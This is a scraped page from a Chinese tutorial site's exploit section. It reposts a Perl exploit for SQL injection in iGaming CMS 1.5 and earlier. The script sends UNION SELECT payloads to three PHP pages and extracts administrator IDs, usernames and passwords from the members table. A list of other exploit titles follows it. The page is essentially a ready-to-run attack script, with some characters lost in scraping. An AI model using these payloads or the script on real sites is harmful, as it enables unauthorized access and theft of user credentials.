手机
当前位置:查字典教程网 >网络安全 >Exploit >iGaming CMS
iGaming CMS
摘要:#!/usr/bin/perl#------------------------------------------------------...

#!/usr/bin/perl

# ----------------------------------------------------------

# iGaming <= 1.5 Multiple Remote SQL Injection Exploit

# Perl Exploit - Output: id:admin:password

# Discovered On: 23/09/2008

# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it

# Proud To Be Italian

# ----------------------------------------------------------

# Usage: perl exploit.pl http://localhost/iGaming

# ---------------------------------------------------------- use strict;

use LWP::UserAgent; my ($one,$two,$exec,$host,$http,$xxx,$view); $view = "' union select 0,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,6,7,8 from sp_members WHERE id='1/*";

$exec = "' union select 1,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3 from sp_members where id='1/*";

$host = shift @ARGV;

$http = new LWP::UserAgent or die $!;

$http->agent("Mozilla/4.5 [en] (Win95; U)");

$http->timeout(1);

if($host !~ /^http://(. ?)$/)

{

print "[?] iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploitn";

print "[?] Usage: perl $0 http://[path]n";

exit;

}

else

{

$one = $http->get($host.'/previews.php?browse='.$exec);

$two = $http->get($host.'/reviews.php?browse='.$exec);

$xxx = $http->get($host.'/index.php?do=viewarticle&id='.$view);

if($one->is_success or $two->is_success or $xxx->is_success)

{

die "$1n" if $one->content =~ /%(. ?)%/;

die "$1n" if $two->content =~ /%(. ?)%/;

die "$1n" if $xxx->content =~ /%(. ?)%/;

}

else

{

die "[ ] Exploit Failed!n";

}

}

【iGaming CMS】相关文章:

Acoustica Mixcraft

Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

The Personal FTP Server 6.0f RETR Denial of Service Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

Maian Search

Dana IRC 1.4a Remote Buffer Overflow Exploit

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)

精品推荐
分类导航